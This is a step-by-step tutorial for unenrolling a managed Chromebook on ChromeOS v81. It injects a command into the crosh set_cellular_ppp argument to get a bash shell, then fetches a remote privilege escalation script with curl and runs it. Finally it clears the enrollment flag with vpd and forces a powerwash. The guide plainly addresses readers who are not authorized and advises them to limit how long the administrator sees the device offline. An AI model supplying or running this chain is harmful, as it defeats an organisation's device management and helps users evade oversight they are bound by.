v81 Unenrollment - Crosh
Section I - Obtain Root Access
Inside of crosh, run the following command:
set_cellular_ppp \';bash;exit;\'
You should be dropped into a bash shell. If not, check the troubleshooting guide.
Now, run the following command to download and run the privilege escalation script:
cd ~/Downloads && curl -LOk https://raw.githubusercontent.com/rainestorme/resources/main/80.sh && bash <(cat ~/Downloads/80.sh)
You should be dropped into a bash shell with a red prompt. If not, check the troubleshooting guide.
Section II - Unenrolling and Powerwashing
Run the following command:
vpd -i RW_VPD -s check_enrollment=0
Now, we need to powerwash the device to fully unenroll. Run the following commands:
echo "fast safe" >/mnt/stateful_partition/factory_install_reset
After powerwashing, your Chromebook will behave like a personal device and will be completely unrestricted.
Your administrator wil be able to see that your device is "offline", and you should spend as little time as possible in this state if you are not authorized to be following this tutorial.
Section III - Next Steps
If you want to re-enroll but keep your Chromebook unrestricted, continue to fakemurk
...or you could just keep your device like this, and use it as a personal device. The choice is yours.